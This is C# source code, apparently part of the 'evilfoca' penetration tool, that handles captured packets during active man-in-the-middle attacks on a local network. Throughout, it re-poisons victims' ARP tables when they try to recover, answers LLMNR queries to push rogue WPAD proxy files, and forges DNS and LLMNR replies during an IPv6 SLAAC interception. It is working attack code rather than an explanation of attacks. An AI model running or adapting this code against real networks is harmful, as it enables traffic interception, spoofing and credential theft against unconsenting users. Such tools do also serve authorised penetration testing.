public void UpdateData()
{
MitmAttack mitmAttack = (MitmAttack)attack;
lbTarget1.Text = mitmAttack.t1.ip.ToString() + " (" + mitmAttack.t1.packetsSend.ToString() + ")";
lbTarget2.Text = mitmAttack.t2.ip.ToString() + " (" + mitmAttack.t2.packetsSend.ToString() + ")";
if (
((mitmAttack.t1.packetsSend == 0) && (mitmAttack.t2.packetsSend > 0))
||
((mitmAttack.t1.packetsSend > 0) && (mitmAttack.t2.packetsSend == 0))
)
{
lbRoute.Text = "Route: Half";
}
else if ((mitmAttack.t1.packetsSend > 0) && (mitmAttack.t2.packetsSend > 0))
{
lbRoute.Text = "Route: Full";
}
else
{
if (!(lbRoute.Text == "Route: None"))
{
lbRoute.Text = "Route: None";
}
}
}
private void AnalyzeIPv6Packet(Packet packet)
{
if (!(packet.PayloadPacket is IPv6Packet))
{
return;
}
if (!(packet is EthernetPacket))
{
return;
}
PhysicalAddress macSrc = ((EthernetPacket)packet).SourceHwAddress;
PhysicalAddress macDst = ((EthernetPacket)packet).DestinationHwAddress;
IPAddress ipSrc = ((IPv6Packet)(((EthernetPacket)packet).PayloadPacket)).SourceAddress;
IPAddress ipDst = ((IPv6Packet)(((EthernetPacket)packet).PayloadPacket)).DestinationAddress;
Data.Neighbor neighborSrc = new Data.Neighbor();
Data.Neighbor neighborDst = new Data.Neighbor();
neighborSrc.physicalAddress = macSrc;
neighborSrc.AddIP(ipSrc);
neighborDst.physicalAddress = macDst;
neighborDst.AddIP(ipDst);
if ((ipSrc.IsIPv6LinkLocal) && (ipDst.IsIPv6LinkLocal || ipDst.IsIPv6Multicast) && (packet.PayloadPacket.PayloadPacket is ICMPv6Packet))
{
AnalyzeICMPv6Packet(packet);
}
if (ipSrc.IsIPv6LinkLocal)
{
// [ Si no se envia desde nuestra mac ] Y [ el vecino no existe ] -> Se crea el vecino
if (!macSrc.Equals(localPhysicalAddress) && !Program.CurrentProject.data.ExistsNeighbor(macSrc))
{
Program.CurrentProject.data.AddNeighbor(neighborSrc);
OnNewNeighbor(new NeighborEventArgs(neighborSrc));
}
// En caso de que el vecino (mac) tenga una nueva IP, se la añadimos
if (Program.CurrentProject.data.GetNeighbor(neighborSrc.physicalAddress) != null &&
!Program.CurrentProject.data.GetNeighbor(neighborSrc.physicalAddress).ExistsIP(ipSrc))
{
Program.CurrentProject.data.GetNeighbor(neighborSrc.physicalAddress).AddIP(ipSrc);
Program.CurrentProject.data.AddNeighbor(neighborSrc);
}
}
if (ipDst.IsIPv6LinkLocal)
{
// [ Si el destino no es nuestra mac ] Y [ el vecino no existe ] -> Se crea el vecino
if (!macDst.Equals(localPhysicalAddress) && !Program.CurrentProject.data.ExistsNeighbor(macDst))
{
Program.CurrentProject.data.AddNeighbor(neighborDst);
OnNewNeighbor(new NeighborEventArgs(neighborDst));
}
if (Program.CurrentProject.data.GetNeighbor(neighborDst.physicalAddress) != null &&
!Program.CurrentProject.data.GetNeighbor(neighborDst.physicalAddress).ExistsIP(ipDst))
{
Program.CurrentProject.data.GetNeighbor(neighborDst.physicalAddress).AddIP(ipDst);
Program.CurrentProject.data.AddNeighbor(neighborDst);
}
}
if ((packet.PayloadPacket.PayloadPacket is TcpPacket) &&
(((TcpPacket)(packet.PayloadPacket.PayloadPacket)).DestinationPort == 80) &&
(((EthernetPacket)packet).Type == EthernetPacketType.IpV6) &&
((IPv6Packet)(((EthernetPacket)packet).PayloadPacket)).DestinationAddress.Equals(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device)))
{
SynchronizedCollection <Attack> lstAttacks = Program.CurrentProject.data.GetAttacks();
foreach (Attack attk in lstAttacks.Where(A => A.attackType == AttackType.WpadIPv6 && A.attackStatus == AttackStatus.Attacking))
{
MitmAttack mitmAtt = (MitmAttack)attk;
if (((IPv6Packet)((EthernetPacket)packet).PayloadPacket).SourceAddress.Equals(mitmAtt.t2.ip))
{
WpadIPv6Attack.Instance.SendWpadFile(packet);
}
}
}
}
private void AnalyzeLLMNR(Packet packet)
{
if (!(packet is EthernetPacket))
{
return;
}
// IPv4 y IPv6
if (packet.PayloadPacket.PayloadPacket is UdpPacket)
{
// Respuestas de LLMNR. De aqui podemos capturar el nombre.
if ((((UdpPacket)(packet.PayloadPacket.PayloadPacket)).SourcePort == 5355) && (((EthernetPacket)packet).Type == EthernetPacketType.IpV4))
{
LLMNR.LLMNRAnswer LLMNRAnswer = new LLMNR.LLMNRAnswer(packet.PayloadPacket.PayloadPacket.PayloadData);
// Solo lo cojemos las respuestas que son de tipo PTR o de tipo A
if (LLMNRAnswer.isPtrResponse == true && LLMNRAnswer.computerName != string.Empty)
{
Neighbor neighbor = Program.CurrentProject.data.GetNeighbor(((EthernetPacket)(packet)).SourceHwAddress);
if (neighbor == null)
{
neighbor = new Neighbor();
neighbor.computerName = LLMNRAnswer.computerName;
neighbor.AddIP(LLMNRAnswer.ipAddress);
neighbor.physicalAddress = ((EthernetPacket)(packet)).SourceHwAddress;
Program.CurrentProject.data.AddNeighbor(neighbor);
NewNeighbor(this, new NeighborEventArgs(neighbor));
}
else
{
neighbor.computerName = LLMNRAnswer.computerName;
Program.CurrentProject.data.AddNeighbor(neighbor);
}
}
}
if ((((EthernetPacket)packet).Type == EthernetPacketType.IpV4) && (((UdpPacket)(packet.PayloadPacket.PayloadPacket)).DestinationPort == 5355))
{
SynchronizedCollection <Attack> lstAttacks = Program.CurrentProject.data.GetAttacks();
// En caso de MITM ARP -> Si el equipo está intentando restablecer su tabla ARP ... se le vuelve a envenenar
foreach (Attack attk in lstAttacks.Where(A => A.attackType == AttackType.WpadIPv4 && A.attackStatus == AttackStatus.Attacking))
{
MitmAttack mitmAtt = (MitmAttack)attk;
if (((IPv4Packet)((EthernetPacket)packet).PayloadPacket).SourceAddress.Equals(mitmAtt.t2.ip))
{
WpadIPv4Attack.Instance.GenerateLLMNRResponse(packet);
}
}
}
if ((((EthernetPacket)packet).Type == EthernetPacketType.IpV6) && (((UdpPacket)(packet.PayloadPacket.PayloadPacket)).DestinationPort == 5355))
{
SynchronizedCollection <Attack> lstAttacks = Program.CurrentProject.data.GetAttacks();
// En caso de MITM ARP -> Si el equipo está intentando restablecer su tabla ARP ... se le vuelve a envenenar
foreach (Attack attk in lstAttacks.Where(A => A.attackType == AttackType.WpadIPv6 && A.attackStatus == AttackStatus.Attacking))
{
MitmAttack mitmAtt = (MitmAttack)attk;
if (((IPv6Packet)((EthernetPacket)packet).PayloadPacket).SourceAddress.Equals(mitmAtt.t2.ip))
{
WpadIPv6Attack.Instance.GenerateLLMNRResponse(packet);
}
}
}
}
}
private void AnalyzeARP(Packet packet)
{
if (!(packet.PayloadPacket is ARPPacket))
{
return;
}
if (!(packet is EthernetPacket))
{
return;
}
EthernetPacket ethernet = (EthernetPacket)packet;
ARPPacket arp = (ARPPacket)packet.PayloadPacket;
// Si el paquete va dirigido a nuestra MAC...
if (ethernet.DestinationHwAddress.Equals(localPhysicalAddress))
{
PhysicalAddress mac = arp.SenderHardwareAddress;
IPAddress ip = arp.SenderProtocolAddress;
Neighbor neighbor = Program.CurrentProject.data.GetNeighbor(mac);
if (neighbor == null)
{
// Creamos el vecino
neighbor = new Neighbor();
neighbor.physicalAddress = mac;
neighbor.AddIP(ip);
Program.CurrentProject.data.AddNeighbor(neighbor);
NewNeighbor(this, new NeighborEventArgs(neighbor));
}
else
{
// Si ya existe, comprobamos si tiene la iP ipv4 y se la añadimos (en caso de que lo la tenga)
if (!neighbor.ExistsIP(ip))
{
neighbor.AddIP(ip);
Program.CurrentProject.data.AddNeighbor(neighbor);
}
}
}
// Si va dirigido a broadcast ...
else if (ethernet.DestinationHwAddress.Equals(PhysicalAddress.Parse("FF-FF-FF-FF-FF-FF")))
{
// Si los que están "negociando" las tablas ARP están siendo atacados por un MITM,
// se les vuelve a atacar envenenando sus tablas
if (arp.Operation == ARPOperation.Request)
{
PhysicalAddress senderMac = arp.SenderHardwareAddress;
PhysicalAddress destinationMac = arp.TargetHardwareAddress;
IPAddress senderIp = arp.SenderProtocolAddress;
IPAddress destinationIp = arp.TargetProtocolAddress;
SynchronizedCollection <Attack> lstAttacks = Program.CurrentProject.data.GetAttacks();
// En caso de MITM ARP -> Si el equipo está intentando restablecer su tabla ARP ... se le vuelve a envenenar
foreach (Attack attk in lstAttacks.Where(A => (A.attackType == AttackType.ARPSpoofing || A.attackType == AttackType.InvalidMacSpoofIpv4) && A.attackStatus == AttackStatus.Attacking))
{
if (attk is MitmAttack)
{
MitmAttack mitmArp = (MitmAttack)attk;
if (
((mitmArp.t1.ip.Equals(senderIp)) || (mitmArp.t1.ip.Equals(destinationIp)))
&&
((mitmArp.t2.ip.Equals(senderIp)) || (mitmArp.t2.ip.Equals(destinationIp)))
)
{
// Lo envia a ambas partes del ataque, se vuelve a envenenar a los dos equipos
// (aunque unicamente sería necesario al que hace la solicitud (request)
ethernet = Attacks.ARPSpoofing.GenerateResponseArpPoison(device.Interface.MacAddress,
((MitmAttack)mitmArp).t2.mac,
((MitmAttack)mitmArp).t2.ip,
((MitmAttack)mitmArp).t1.ip);
Program.CurrentProject.data.SendPacket(ethernet);
ethernet = Attacks.ARPSpoofing.GenerateResponseArpPoison(device.Interface.MacAddress,
((MitmAttack)mitmArp).t1.mac,
((MitmAttack)mitmArp).t1.ip,
((MitmAttack)mitmArp).t2.ip);
Program.CurrentProject.data.SendPacket(ethernet);
}
}
else if (attk is InvalidMacSpoofAttackIpv4Attack)
{
ethernet = Attacks.ARPSpoofing.GenerateResponseArpPoison(device.Interface.MacAddress,
((InvalidMacSpoofAttackIpv4Attack)attk).t2.mac,
((InvalidMacSpoofAttackIpv4Attack)attk).t2.ip,
((InvalidMacSpoofAttackIpv4Attack)attk).t1.ip);
Program.CurrentProject.data.SendPacket(ethernet);
}
}
}
}
OnNewARP(new ArpEventArgs(packet));
}
private void DNSCheck(Packet p)
{
EthernetPacket ethernet = (EthernetPacket)p;
if (p.PayloadPacket.PayloadPacket is UdpPacket)
{
UdpPacket udp = p.PayloadPacket.PayloadPacket as UdpPacket;
attacks.Where(a => a.attackType == AttackType.SlaacMitm).ToList().ForEach(currentAttack =>
{
MitmAttack mitmAttack = currentAttack as MitmAttack;
if (p.PayloadPacket is IPv6Packet)
{
switch (udp.DestinationPort)
{
case 53:
Heijden.DNS.Response response = new Heijden.DNS.Response(new IPEndPoint(IPAddress.Parse("1.2.3.4"), 53), udp.PayloadData);
var aaaaDns = (from q in response.Questions
where q.QType == Heijden.DNS.QType.AAAA || q.QType == Heijden.DNS.QType.A
select q).ToList();
//Para mostrar la pelotita de conexión a internet OK, respondemos al paquete Teredo de Microsoft en formato A.
var aTeredoDns = (from q in response.Questions
where q.QType == Heijden.DNS.QType.A &&
(q.QName.ToLower().Contains("teredo") || q.QName.ToLower().Contains("msftncsi"))
select q).ToList();
if (aaaaDns != null && aaaaDns.Count > 0)
{
DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData);
string q = query.name;
IPAddress[] ips = Dns.GetHostAddresses(q);
DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv6, query.transID, query.nameDnsFormat, ips[0]);
byte[] respByteAr = resp.GeneratePacket();
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = respByteAr;
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
else if (aTeredoDns != null && aTeredoDns.Count > 0)
{
DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData);
string q = query.name;
IPAddress[] ips = Dns.GetHostAddresses(q);
DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv4, query.transID, query.nameDnsFormat, ips[0]);
byte[] respByteAr = resp.GeneratePacket();
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = respByteAr;
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
break;
case 5355:
LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket();
llmnr.ParsePacket(udp.PayloadData);
if (llmnr.Query.Type.HasValue && llmnr.Query.Type.Value == LLMNR.DNSType.AAAA)
{
IPAddress[] ips = (from ip in Dns.GetHostAddresses(llmnr.Query.Name)
where ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork
select ip).ToArray();
byte[] ipv6Addr = new byte[] { 0x00, 0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,
(byte)ips[0].GetAddressBytes()[0], (byte)ips[0].GetAddressBytes()[1],
(byte)ips[0].GetAddressBytes()[2], (byte)ips[0].GetAddressBytes()[3] };
llmnr.AnswerList.Add(new LLMNR.DNSAnswer()
{
Class = evilfoca.LLMNR.DNSClass.IN,
Name = llmnr.Query.Name,
Type = evilfoca.LLMNR.DNSType.AAAA,
RData = ipv6Addr,
RDLength = (short)ipv6Addr.Length
});
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = llmnr.BuildPacket();
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
break;
default:
break;
}
}
});
}
}